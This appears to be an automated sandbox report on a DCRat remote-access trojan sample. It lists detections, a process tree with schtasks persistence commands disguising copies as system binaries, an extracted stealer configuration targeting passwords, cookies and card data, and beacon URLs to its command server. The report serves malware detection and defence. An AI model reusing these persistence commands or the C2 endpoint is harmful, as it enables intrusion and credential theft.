Edit tour

Windows Analysis Report
QoRXFaE8Xn.exe

Overview

General Information

Sample name:	QoRXFaE8Xn.exe renamed because original name is a hash value
Original sample name:	08e95dabb86201eeb98188769e4fcd62.exe
Analysis ID:	1585574
MD5:	08e95dabb86201eeb98188769e4fcd62
SHA1:	40a819d79a67c7be05f9c0c45ee7558ec58971f9
SHA256:	9bf9efa06f63a21c9893e1acfa2ae7838ab3bdcb7d768ef6304756845395bfb7
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

QoRXFaE8Xn.exe (PID: 432 cmdline: "C:\Users\user\Desktop\QoRXFaE8Xn.exe" MD5: 08E95DABB86201EEB98188769E4FCD62)

wscript.exe (PID: 7164 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 1988 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Runtimemonitor.exe (PID: 5860 cmdline: "C:\PortcomAgentwinbroker\Runtimemonitor.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

schtasks.exe (PID: 6656 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1436 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5064 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6768 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6204 cmdline: schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6156 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6380 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7064 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1576 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dasHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1784 cmdline: schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3116 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

ihpxTeRPVLYTpFZNVeq.exe (PID: 1488 cmdline: "C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

dasHost.exe (PID: 6656 cmdline: C:\Recovery\dasHost.exe MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

dasHost.exe (PID: 1436 cmdline: C:\Recovery\dasHost.exe MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

ihpxTeRPVLYTpFZNVeq.exe (PID: 1532 cmdline: "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

ihpxTeRPVLYTpFZNVeq.exe (PID: 320 cmdline: "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

smartscreen.exe (PID: 1276 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

smartscreen.exe (PID: 6768 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe" MD5: 2EFFCBFE83A6E643D620BD7221B8D4CC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"0\":\"*\",\"I\":\"&\",\"L\":\"^\",\"6\":\"%\",\"J\":\"(\",\"G\":\"$\",\"9\":\",\",\"M\":\"_\",\"c\":\".\",\"i\":\"<\",\"o\":\";\",\"R\":\"@\",\"S\":\"!\",\"k\":\"~\",\"d\":\"-\",\"y\":\")\",\"U\":\"`\",\"F\":\" \",\"H\":\">\",\"P\":\"|\",\"Y\":\"#\"}", "PCRT": "{\"f\":\"%\",\"i\":\"<\",\"c\":\"`\",\"x\":\"$\",\"w\":\">\",\"6\":\"#\",\"=\":\")\",\"I\":\"|\",\"M\":\" \",\"S\":\"(\",\"l\":\"!\",\"y\":\";\",\"j\":\"*\",\"0\":\".\",\"X\":\",\",\"b\":\"-\",\"e\":\"^\",\"Q\":\"&\",\"p\":\"_\",\"D\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-zORf9p7ya8eJeSOopm7y", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.2214484394.00000000023A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000016.00000002.2214669811.0000000003328000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2214484394.0000000002361000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000018.00000002.2214661372.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000016.00000002.2214669811.00000000032F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2109875192.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000013.00000002.2215363217.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000018.00000002.2214661372.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000017.00000002.2214448921.0000000002361000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.2213895639.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Runtimemonitor.exe PID: 5860	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1488	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 6656	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 1436	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1532	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 320	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smartscreen.exe PID: 1276	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smartscreen.exe PID: 6768	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\PortcomAgentwinbroker\Runtimemonitor.exe, ProcessId: 5860, TargetFilename: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe, SourceProcessId: 6768, StartAddress: A858FF80, TargetImage: C:\Windows\System32\schtasks.exe, TargetProcessId: 6768

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\dasHost.exe, CommandLine: C:\Recovery\dasHost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dasHost.exe, NewProcessName: C:\Recovery\dasHost.exe, OriginalFileName: C:\Recovery\dasHost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Recovery\dasHost.exe, ProcessId: 6656, ProcessName: dasHost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\QoRXFaE8Xn.exe", ParentImage: C:\Users\user\Desktop\QoRXFaE8Xn.exe, ParentProcessId: 432, ParentProcessName: QoRXFaE8Xn.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe" , ProcessId: 7164, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\PortcomAgentwinbroker\Runtimemonitor.exe", ParentImage: C:\PortcomAgentwinbroker\Runtimemonitor.exe, ParentProcessId: 5860, ParentProcessName: Runtimemonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f, ProcessId: 6156, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T21:02:08.606672+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49704	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: QoRXFaE8Xn.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://dragon-rp.com	Avira URL Cloud: Label: malware
Source: http://dragon-rp.com/	Avira URL Cloud: Label: malware
Source: http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238	Avira URL Cloud: Label: malware
Source: http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\dasHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe	Avira: detection malicious, Label: VBS/Runner.VPG

Found malware configuration

Source: 00000013.00000002.2215363217.0000000002991000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"0\":\"*\",\"I\":\"&\",\"L\":\"^\",\"6\":\"%\",\"J\":\"(\",\"G\":\"$\",\"9\":\",\",\"M\":\"_\",\"c\":\".\",\"i\":\"<\",\"o\":\";\",\"R\":\"@\",\"S\":\"!\",\"k\":\"~\",\"d\":\"-\",\"y\":\")\",\"U\":\"`\",\"F\":\" \",\"H\":\">\",\"P\":\"|\",\"Y\":\"#\"}", "PCRT": "{\"f\":\"%\",\"i\":\"<\",\"c\":\"`\",\"x\":\"$\",\"w\":\">\",\"6\":\"#\",\"=\":\")\",\"I\":\"|\",\"M\":\" \",\"S\":\"(\",\"l\":\"!\",\"y\":\";\",\"j\":\"*\",\"0\":\".\",\"X\":\",\",\"b\":\"-\",\"e\":\"^\",\"Q\":\"&\",\"p\":\"_\",\"D\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-zORf9p7ya8eJeSOopm7y", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	ReversingLabs: Detection: 73%
Source: C:\Recovery\dasHost.exe	ReversingLabs: Detection: 73%
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: QoRXFaE8Xn.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Joe Sandbox ML: detected
Source: C:\Recovery\dasHost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: QoRXFaE8Xn.exe

Joe Sandbox ML: detected

Source: QoRXFaE8Xn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QoRXFaE8Xn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QoRXFaE8Xn.exe

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_008CA5F4
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_008DB8E0
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008EAAA8 FindFirstFileExA,	0_2_008EAAA8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 188.114.96.3:80

Source: global traffic

TCP traffic: 192.168.2.5:59316 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: dragon-rp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: dragon-rp.com

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: dragon-rp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: dragon-rp.com

Source: global traffic

DNS traffic detected: DNS query: dragon-rp.com

Source: ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dragon-rp.com
Source: ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dragon-rp.com/
Source: ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238
Source: dasHost.exe, 00000014.00000002.2212408044.0000000000781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: Runtimemonitor.exe, 00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008C718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_008C718C

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe			Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Windows\appcompat\encapsulation\ca1d63bd2d464f			Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008C857B	0_2_008C857B
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D70BF	0_2_008D70BF
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008ED00E	0_2_008ED00E
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008C407E	0_2_008C407E
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008F1194	0_2_008F1194
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008C3281	0_2_008C3281
